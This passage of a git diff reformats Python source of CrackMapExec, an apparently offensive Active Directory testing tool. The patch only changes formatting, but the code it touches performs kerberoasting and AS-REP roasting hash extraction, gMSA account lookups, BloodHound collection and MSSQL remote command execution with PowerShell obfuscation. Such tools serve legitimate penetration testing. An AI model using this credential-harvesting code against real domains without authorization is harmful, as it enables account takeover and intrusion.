get all group cn name - search_filter = ( - "(|(objectSid=" - + self.sid_domain - + "-512)(objectSid=" - + self.sid_domain - + "-544)(objectSid=" - + self.sid_domain - + "-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))" - ) + search_filter = "(|(objectSid=" + self.sid_domain + "-512)(objectSid=" + self.sid_domain + "-544)(objectSid=" + self.sid_domain + "-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))" attributes = ["distinguishedName"] resp = self.search(search_filter, attributes, sizeLimit=0) answers = [] @@ -933,22 +836,10 @@ class ldap(connection): continue for attribute in item["attributes"]: if str(attribute["type"]) == "distinguishedName": - answers.append( - str( - "(memberOf:1.2.840.113556.1.4.1941:=" - + attribute["vals"][0] - + ")" - ) - ) + answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute["vals"][0] + ")")) # 3. get member of these groups - search_filter = ( - "(&(objectCategory=user)(sAMAccountName=" - + self.username - + ")(|" - + "".join(answers) - + "))" - ) + search_filter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + "".join(answers) + "))" attributes = [""] resp = self.search(search_filter, attributes, sizeLimit=0) answers = [] @@ -975,9 +866,7 @@ class ldap(connection): return resp except ldap_impacket.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - self.logger.fail( - "sizeLimitExceeded exception caught, giving up and processing the data received" - ) + self.logger.fail("sizeLimitExceeded exception caught, giving up and processing the data received") # We reached the sizeLimit, process the answers we have already and that's it. Until we implement # paged queries resp = e.getAnswers() @@ -1049,11 +938,7 @@ class ldap(connection): if self.password == "" and self.nthash == "" and self.kerberos is False: return False # Building the search filter - search_filter = ( - "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" - "(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" - % (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE) - ) + search_filter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" "(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE) attributes = [ "sAMAccountName", "pwdLastSet", @@ -1090,20 +975,12 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) if mustCommit is True: answers.append( [ @@ -1133,10 +1010,7 @@ class ldap(connection): def kerberoasting(self): # Building the search filter - searchFilter = ( - "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" - "(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))" - ) + searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" "(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))" attributes = [ "servicePrincipalName", "sAMAccountName", @@ -1171,10 +1045,7 @@ class ldap(connection): 
userAccountControl = str(attribute["vals"][0]) if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION: delegation = "unconstrained" - elif ( - int(userAccountControl) - & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - ): + elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: delegation = "constrained" elif str(attribute["type"]) == "memberOf": memberOf = str(attribute["vals"][0]) @@ -1182,29 +1053,19 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "servicePrincipalName": for spn in attribute["vals"]: SPNs.append(str(spn)) if mustCommit is True: if int(userAccountControl) & UF_ACCOUNTDISABLE: - self.logger.debug( - f"Bypassing disabled account {sAMAccountName} " - ) + self.logger.debug(f"Bypassing disabled account {sAMAccountName} ") else: for spn in SPNs: answers.append( @@ -1218,9 +1079,7 @@ class ldap(connection): ] ) except Exception as e: - cme_logger.error( - f"Skipping item, cannot process due to error {str(e)}" - ) + cme_logger.error(f"Skipping item, cannot process due to error {str(e)}") pass if len(answers) > 0: @@ -1240,9 +1099,7 @@ class ldap(connection): try: principalName = Principal() - principalName.type = ( - constants.PrincipalNameType.NT_MS_PRINCIPAL.value - ) + principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value principalName.components = [downLevelLogonName] tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS( @@ -1260,13 +1117,9 @@ class ldap(connection): sAMAccountName, self.targetDomain + "/" + sAMAccountName, ) - self.logger.highlight( - f"sAMAccountName: {sAMAccountName} memberOf: {memberOf} pwdLastSet: {pwdLastSet} lastLogon:{lastLogon}" - ) + self.logger.highlight(f"sAMAccountName: {sAMAccountName} memberOf: {memberOf} pwdLastSet: {pwdLastSet} lastLogon:{lastLogon}") self.logger.highlight(f"{r}") - with open( - self.args.kerberoasting, "a+" - ) as hash_kerberoasting: + with open(self.args.kerberoasting, "a+") as hash_kerberoasting: hash_kerberoasting.write(r + "\n") dejavue.append(sAMAccountName) except Exception as e: @@ -1315,20 +1168,12 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) if mustCommit is True: answers.append( [ @@ -1369,9 +1214,7 @@ class ldap(connection): ) except ldap_impacket.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - self.logger.debug( - "sizeLimitExceeded exception caught, giving up and processing the data received" - ) + self.logger.debug("sizeLimitExceeded exception caught, giving up and 
processing the data received") # We reached the sizeLimit, process the answers we have already and that's it. Until we implement # paged queries resp = e.getAnswers() @@ -1406,20 +1249,12 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) if mustCommit is True: answers.append( [ @@ -1433,9 +1268,7 @@ class ldap(connection): ) except Exception as e: self.logger.debug("Exception:", exc_info=True) - self.logger.debug( - f"Skipping item, cannot process due to error {str(e)}" - ) + self.logger.debug(f"Skipping item, cannot process due to error {str(e)}") pass if len(answers) > 0: self.logger.debug(answers) @@ -1481,20 +1314,12 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) if mustCommit is True: answers.append( [ @@ -1507,9 +1332,7 @@ class ldap(connection): ) except Exception as e: self.logger.debug("Exception:", exc_info=True) - self.logger.debug( - f"Skipping item, cannot process due to error {str(e)}" - ) + self.logger.debug(f"Skipping item, cannot process due to error {str(e)}") pass if len(answers) > 0: self.logger.debug(answers) @@ -1560,9 +1383,7 @@ class ldap(connection): gmsa_account_name = (domain_name + account_name).upper() self.logger.debug(f"GMSA name for {gmsa_account_name}") bin_account_name = gmsa_account_name.encode("utf-16le") - bin_hash = hmac.new( - bytes("", "latin-1"), msg=bin_account_name, digestmod=hashlib.sha256 - ).digest() + bin_hash = hmac.new(bytes("", "latin-1"), msg=bin_account_name, digestmod=hashlib.sha256).digest() hex_letters = "0123456789abcdef" str_hash = "" for b in bin_hash: @@ -1586,29 +1407,17 @@ class ldap(connection): ) if gmsa_accounts: answers = [] - self.logger.debug( - f"Total of records returned {len(gmsa_accounts):d}" - ) + self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}") for item in gmsa_accounts: - if ( - isinstance(item, ldapasn1_impacket.SearchResultEntry) - is not True - ): + if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True: continue sAMAccountName = "" for attribute in item["attributes"]: if str(attribute["type"]) == "sAMAccountName": sAMAccountName = str(attribute["vals"][0]) - if ( - self.decipher_gmsa_name( - self.domain.split(".")[0], sAMAccountName[:-1] - ) - == self.args.gmsa_convert_id - ): - self.logger.highlight( - f"Account: {sAMAccountName:<20} ID: {self.args.gmsa_convert_id}" - ) + if self.decipher_gmsa_name(self.domain.split(".")[0], sAMAccountName[:-1]) == self.args.gmsa_convert_id: + self.logger.highlight(f"Account: {sAMAccountName:<20} 
ID: {self.args.gmsa_convert_id}") break else: self.logger.fail("No string provided :'(") @@ -1629,26 +1438,16 @@ class ldap(connection): ) if gmsa_accounts: answers = [] - self.logger.debug( - f"Total of records returned {len(gmsa_accounts):d}" - ) + self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}") for item in gmsa_accounts: - if ( - isinstance(item, ldapasn1_impacket.SearchResultEntry) - is not True - ): + if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True: continue sAMAccountName = "" for attribute in item["attributes"]: if str(attribute["type"]) == "sAMAccountName": sAMAccountName = str(attribute["vals"][0]) - if ( - self.decipher_gmsa_name( - self.domain.split(".")[0], sAMAccountName[:-1] - ) - == gmsa_id - ): + if self.decipher_gmsa_name(self.domain.split(".")[0], sAMAccountName[:-1]) == gmsa_id: gmsa_id = sAMAccountName break # convert to ntlm @@ -1681,14 +1480,10 @@ class ldap(connection): dns_tcp=False, dns_timeout=3, ) - collect = resolve_collection_methods( - "Default" if not self.args.collection else self.args.collection - ) + collect = resolve_collection_methods("Default" if not self.args.collection else self.args.collection) if not collect: return - self.logger.highlight( - "Resolved collection methods: %s", ", ".join(list(collect)) - ) + self.logger.highlight("Resolved collection methods: %s", ", ".join(list(collect))) self.logger.debug("Using DNS to retrieve domain information") ad.dns_resolve(domain=self.domain) @@ -1713,9 +1508,7 @@ class ldap(connection): exclude_dcs=False, ) - self.logger.highlight( - f"Compressing output into {self.output_filename}bloodhound.zip" - ) + self.logger.highlight(f"Compressing output into {self.output_filename}bloodhound.zip") list_of_files = os.listdir(os.getcwd()) with ZipFile(self.output_filename + "bloodhound.zip", "w") as z: for each_file in list_of_files: diff --git a/cme/protocols/ldap/bloodhound.py b/cme/protocols/ldap/bloodhound.py index b85d2f21..1b9f42db 100644 --- a/cme/protocols/ldap/bloodhound.py +++ b/cme/protocols/ldap/bloodhound.py @@ -18,21 +18,15 @@ class BloodHound(object): self.proto_logger(port, hostname, host) def proto_logger(self, port, hostname, host): - self.logger = CMEAdapter( - extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname} - ) + self.logger = CMEAdapter(extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname}) def connect(self): if len(self.ad.dcs()) == 0: - self.logger.fail( - "Could not find a domain controller. Consider specifying a domain and/or DNS server." - ) + self.logger.fail("Could not find a domain controller. Consider specifying a domain and/or DNS server.") sys.exit(1) if not self.ad.baseDN: - self.logger.fail( - "Could not figure out the domain to query. Please specify this manually with -d" - ) + self.logger.fail("Could not figure out the domain to query. 
Please specify this manually with -d") sys.exit(1) pdc = self.ad.dcs()[0] @@ -87,9 +81,7 @@ class BloodHound(object): cache_computers=do_computer_enum, ) # Initialize enumerator - membership_enum = MembershipEnumerator( - self.ad, self.pdc, collect, disable_pooling - ) + membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling) membership_enum.enumerate_memberships(timestamp=timestamp) elif "container" in collect: # Fetch domains for later, computers if needed @@ -99,16 +91,12 @@ class BloodHound(object): cache_computers=do_computer_enum, ) # Initialize enumerator - membership_enum = MembershipEnumerator( - self.ad, self.pdc, collect, disable_pooling - ) + membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling) membership_enum.do_container_collection(timestamp=timestamp) elif do_computer_enum: # We need to know which computers to query regardless # We also need the domains to have a mapping from NETBIOS -> FQDN for local admins - self.pdc.prefetch_info( - "objectprops" in collect, "acl" in collect, cache_computers=True - ) + self.pdc.prefetch_info("objectprops" in collect, "acl" in collect, cache_computers=True) elif "trusts" in collect: # Prefetch domains self.pdc.get_domains("acl" in collect) @@ -126,9 +114,7 @@ class BloodHound(object): computerfile=computerfile, exclude_dcs=exclude_dcs, ) - computer_enum.enumerate_computers( - self.ad.computers, num_workers=num_workers, timestamp=timestamp - ) + computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp) end_time = time.time() minutes, seconds = divmod(int(end_time - start_time), 60) self.logger.highlight("Done in %02dM %02dS" % (minutes, seconds)) diff --git a/cme/protocols/ldap/database.py b/cme/protocols/ldap/database.py index 7df4a37a..d702a5db 100644 --- a/cme/protocols/ldap/database.py +++ b/cme/protocols/ldap/database.py @@ -47,19 +47,10 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): diff --git a/cme/protocols/ldap/db_navigator.py b/cme/protocols/ldap/db_navigator.py index b1afbf92..36777af1 100644 --- a/cme/protocols/ldap/db_navigator.py +++ b/cme/protocols/ldap/db_navigator.py @@ -6,12 +6,7 @@ from cme.cmedb import DatabaseNavigator, print_help class 
navigator(DatabaseNavigator): def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/ldap/gmsa.py b/cme/protocols/ldap/gmsa.py index 5700914e..3e2e7f31 100644 --- a/cme/protocols/ldap/gmsa.py +++ b/cme/protocols/ldap/gmsa.py @@ -28,20 +28,9 @@ class MSDS_MANAGEDPASSWORD_BLOB(Structure): else: endData = self["PreviousPasswordOffset"] - self["CurrentPassword"] = self.rawData[self["CurrentPasswordOffset"] :][ - : endData - self["CurrentPasswordOffset"] - ] + self["CurrentPassword"] = self.rawData[self["CurrentPasswordOffset"] :][: endData - self["CurrentPasswordOffset"]] if self["PreviousPasswordOffset"] != 0: - self["PreviousPassword"] = self.rawData[self["PreviousPasswordOffset"] :][ - : self["QueryPasswordIntervalOffset"] - self["PreviousPasswordOffset"] - ] + self["PreviousPassword"] = self.rawData[self["PreviousPasswordOffset"] :][: self["QueryPasswordIntervalOffset"] - self["PreviousPasswordOffset"]] - self["QueryPasswordInterval"] = self.rawData[ - self["QueryPasswordIntervalOffset"] : - ][ - : self["UnchangedPasswordIntervalOffset"] - - self["QueryPasswordIntervalOffset"] - ] - self["UnchangedPasswordInterval"] = self.rawData[ - self["UnchangedPasswordIntervalOffset"] : - ] + self["QueryPasswordInterval"] = self.rawData[self["QueryPasswordIntervalOffset"] :][: self["UnchangedPasswordIntervalOffset"] - self["QueryPasswordIntervalOffset"]] + self["UnchangedPasswordInterval"] = self.rawData[self["UnchangedPasswordIntervalOffset"] :] diff --git a/cme/protocols/ldap/kerberos.py b/cme/protocols/ldap/kerberos.py index 584a2d27..cca85b9d 100644 --- a/cme/protocols/ldap/kerberos.py +++ b/cme/protocols/ldap/kerberos.py @@ -65,76 +65,44 @@ class KerberosAttacks: # Regarding AES encryption type (AES128 CTS HMAC-SHA1 96 and AES256 CTS HMAC-SHA1 96) # last 12 bytes of the encrypted ticket represent the checksum of the decrypted # ticket - if ( - decodedTGS["ticket"]["enc-part"]["etype"] - == constants.EncryptionTypes.rc4_hmac.value - ): + if decodedTGS["ticket"]["enc-part"]["etype"] == constants.EncryptionTypes.rc4_hmac.value: entry = "$krb5tgs$%d$*%s$%s$%s*$%s$%s" % ( constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS["ticket"]["realm"], spn.replace(":", "~"), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][:16].asOctets() - ).decode(), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][16:].asOctets() - ).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][:16].asOctets()).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][16:].asOctets()).decode(), ) - elif ( - decodedTGS["ticket"]["enc-part"]["etype"] - == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value - ): + elif decodedTGS["ticket"]["enc-part"]["etype"] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value: entry = "$krb5tgs$%d$%s$%s$*%s*$%s$%s" % ( constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS["ticket"]["realm"], spn.replace(":", "~"), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][-12:].asOctets() - ).decode(), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][:-12:].asOctets() - ).decode, + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][-12:].asOctets()).decode(), + 
hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][:-12:].asOctets()).decode, ) - elif ( - decodedTGS["ticket"]["enc-part"]["etype"] - == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value - ): + elif decodedTGS["ticket"]["enc-part"]["etype"] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value: entry = "$krb5tgs$%d$%s$%s$*%s*$%s$%s" % ( constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS["ticket"]["realm"], spn.replace(":", "~"), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][-12:].asOctets() - ).decode(), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][:-12:].asOctets() - ).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][-12:].asOctets()).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][:-12:].asOctets()).decode(), ) - elif ( - decodedTGS["ticket"]["enc-part"]["etype"] - == constants.EncryptionTypes.des_cbc_md5.value - ): + elif decodedTGS["ticket"]["enc-part"]["etype"] == constants.EncryptionTypes.des_cbc_md5.value: entry = "$krb5tgs$%d$*%s$%s$%s*$%s$%s" % ( constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS["ticket"]["realm"], spn.replace(":", "~"), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][:16].asOctets() - ).decode(), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][16:].asOctets() - ).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][:16].asOctets()).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][16:].asOctets()).decode(), ) else: - cme_logger.error( - "Skipping" - f" {decodedTGS['ticket']['sname']['name-string'][0]}/{decodedTGS['ticket']['sname']['name-string'][1]} due" - f" to incompatible e-type {decodedTGS['ticket']['enc-part']['etype']:d}" - ) + cme_logger.error("Skipping" f" {decodedTGS['ticket']['sname']['name-string'][0]}/{decodedTGS['ticket']['sname']['name-string'][1]} due" f" to incompatible e-type {decodedTGS['ticket']['enc-part']['etype']:d}") return entry @@ -160,9 +128,7 @@ class KerberosAttacks: pass # No TGT in cache, request it - userName = Principal( - self.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value - ) + userName = Principal(self.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value) # In order to maximize the probability of getting session tickets with RC4 etype, we will convert the # password to ntlm hashes (that will force to use RC4 for the TGT). 
If that doesn't work, we use the @@ -209,16 +175,12 @@ class KerberosAttacks: return TGT def getTGT_asroast(self, userName, requestPAC=True): - clientName = Principal( - userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value - ) + clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value) asReq = AS_REQ() domain = self.targetDomain.upper() - serverName = Principal( - "krbtgt/%s" % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value - ) + serverName = Principal("krbtgt/%s" % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value) pacRequest = KERB_PA_PAC_REQUEST() pacRequest["include-pac"] = requestPAC @@ -229,9 +191,7 @@ class KerberosAttacks: asReq["padata"] = noValue asReq["padata"][0] = noValue - asReq["padata"][0]["padata-type"] = int( - constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value - ) + asReq["padata"][0]["padata-type"] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value) asReq["padata"][0]["padata-value"] = encodedPacRequest reqBody = seq_set(asReq, "req-body") @@ -274,11 +234,7 @@ class KerberosAttacks: message = encoder.encode(asReq) r = sendReceive(message, domain, self.kdcHost) elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_KEY_EXPIRED.value: - return ( - "Password of user " - + userName - + " expired but user doesn't require pre-auth" - ) + return "Password of user " + userName + " expired but user doesn't require pre-auth" else: cme_logger.debug(e) return False @@ -292,9 +248,7 @@ class KerberosAttacks: asRep = decoder.decode(r, asn1Spec=AS_REP())[0] else: # The user doesn't have UF_DONT_REQUIRE_PREAUTH set - cme_logger.debug( - "User %s doesn't have UF_DONT_REQUIRE_PREAUTH set" % userName - ) + cme_logger.debug("User %s doesn't have UF_DONT_REQUIRE_PREAUTH set" % userName) return # Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it. 
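A minimal, self-contained sketch (not part of the patch) of the hashcat-style entry that the rc4_hmac branch of KerberosAttacks in cme/protocols/ldap/kerberos.py above builds; the function name and parameters here are illustrative, and in the real code the cipher bytes come from the decoded TGS enc-part rather than being passed in directly:

from binascii import hexlify

def krb5tgs_rc4_entry(username: str, realm: str, spn: str, cipher: bytes) -> str:
    # etype 23 (rc4_hmac): the first 16 bytes of the encrypted part are the checksum,
    # the remainder is the encrypted ticket data; both are hex-encoded into the
    # "$krb5tgs$23$*user$REALM$spn*$checksum$data" format shown in the diff.
    checksum = hexlify(cipher[:16]).decode()
    data = hexlify(cipher[16:]).decode()
    return "$krb5tgs$23$*%s$%s$%s*$%s$%s" % (username, realm, spn.replace(":", "~"), checksum, data)

As the comment in the patched code notes, the password is converted to NTLM hashes before requesting the TGT precisely to maximize the chance of receiving RC4 (etype 23) service tickets, which crack faster than the AES variants handled by the other branches.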
diff --git a/cme/protocols/ldap/smbldap.py b/cme/protocols/ldap/smbldap.py index eacc92f9..8d0c0075 100644 --- a/cme/protocols/ldap/smbldap.py +++ b/cme/protocols/ldap/smbldap.py @@ -27,9 +27,7 @@ class LDAPConnect: self.proto_logger(host, port, hostname) def proto_logger(self, host, port, hostname): - self.logger = CMEAdapter( - extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname} - ) + self.logger = CMEAdapter(extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname}) def kerberos_login( self, @@ -82,9 +80,7 @@ class LDAPConnect: if str(e).find("strongerAuthRequired") >= 0: # We need to try SSL try: - ldapConnection = ldap_impacket.LDAPConnection( - f"ldaps://{kdcHost}", baseDN - ) + ldapConnection = ldap_impacket.LDAPConnection(f"ldaps://{kdcHost}", baseDN) ldapConnection.login( username, password, @@ -114,9 +110,7 @@ class LDAPConnect: return False except OSError as e: - self.logger.debug( - f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}" - ) + self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}") return False except KerberosError as e: self.logger.fail( @@ -144,9 +138,7 @@ class LDAPConnect: baseDN = baseDN[:-1] try: - ldapConnection = ldap_impacket.LDAPConnection( - f"ldap://{domain}", baseDN, domain - ) + ldapConnection = ldap_impacket.LDAPConnection(f"ldap://{domain}", baseDN, domain) ldapConnection.login(username, password, domain, lmhash, nthash) # Connect to LDAP @@ -161,9 +153,7 @@ class LDAPConnect: if str(e).find("strongerAuthRequired") >= 0: # We need to try SSL try: - ldapConnection = ldap_impacket.LDAPConnection( - f"ldaps://{domain}", baseDN, domain - ) + ldapConnection = ldap_impacket.LDAPConnection(f"ldaps://{domain}", baseDN, domain) ldapConnection.login(username, password, domain, lmhash, nthash) self.logger.extra["protocol"] = "LDAPS" self.logger.extra["port"] = "636" @@ -184,7 +174,5 @@ class LDAPConnect: return False except OSError as e: - self.logger.debug( - f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}" - ) + self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}") return False diff --git a/cme/protocols/mssql.py b/cme/protocols/mssql.py index 637d53e7..a79cf8ef 100755 --- a/cme/protocols/mssql.py +++ b/cme/protocols/mssql.py @@ -40,13 +40,9 @@ class mssql(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - mssql_parser = parser.add_parser( - "mssql", help="own stuff using MSSQL", parents=[std_parser, module_parser] - ) + mssql_parser = parser.add_parser("mssql", help="own stuff using MSSQL", parents=[std_parser, module_parser]) dgroup = mssql_parser.add_mutually_exclusive_group() - dgroup.add_argument( - "-d", metavar="DOMAIN", dest="domain", type=str, help="domain name" - ) + dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, help="domain name") dgroup.add_argument( "--local-auth", action="store_true", @@ -87,17 +83,13 @@ class mssql(connection): help="continues authentication attempts even after successes", ) - cgroup = mssql_parser.add_argument_group( - "Command Execution", "options for 
executing commands" - ) + cgroup = mssql_parser.add_argument_group("Command Execution", "options for executing commands") cgroup.add_argument( "--force-ps32", action="store_true", help="force the PowerShell command to run in a 32-bit process", ) - cgroup.add_argument( - "--no-output", action="store_true", help="do not retrieve command output" - ) + cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output") xgroup = cgroup.add_mutually_exclusive_group() xgroup.add_argument( "-x", @@ -112,21 +104,15 @@ class mssql(connection): help="execute the specified PowerShell command", ) - psgroup = mssql_parser.add_argument_group( - "Powershell Obfuscation", "Options for PowerShell script obfuscation" - ) - psgroup.add_argument( - "--obfs", action="store_true", help="Obfuscate PowerShell scripts" - ) + psgroup = mssql_parser.add_argument_group("Powershell Obfuscation", "Options for PowerShell script obfuscation") + psgroup.add_argument("--obfs", action="store_true", help="Obfuscate PowerShell scripts") psgroup.add_argument( "--clear-obfscripts", action="store_true", help="Clear all cached obfuscated PowerShell scripts", ) - tgroup = mssql_parser.add_argument_group( - "Files", "Options for put and get remote files" - ) + tgroup = mssql_parser.add_argument_group("Files", "Options for put and get remote files") tgroup.add_argument( "--put-file", nargs=2, @@ -198,9 +184,7 @@ class mssql(connection): if self.args.local_auth: self.domain = self.hostname except Exception as e: - self.logger.fail( - f"Error retrieving host domain: {e} specify one manually with the '-d' flag" - ) + self.logger.fail(f"Error retrieving host domain: {e} specify one manually with the '-d' flag") self.mssql_instances = self.conn.getInstances(0) self.db.add_host( @@ -217,9 +201,7 @@ class mssql(connection): pass def print_host_info(self): - self.logger.display( - f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" - ) + self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})") # if len(self.mssql_instances) > 0: # self.logger.display("MSSQL DB Instances: {}".format(len(self.mssql_instances))) # for i, instance in enumerate(self.mssql_instances): @@ 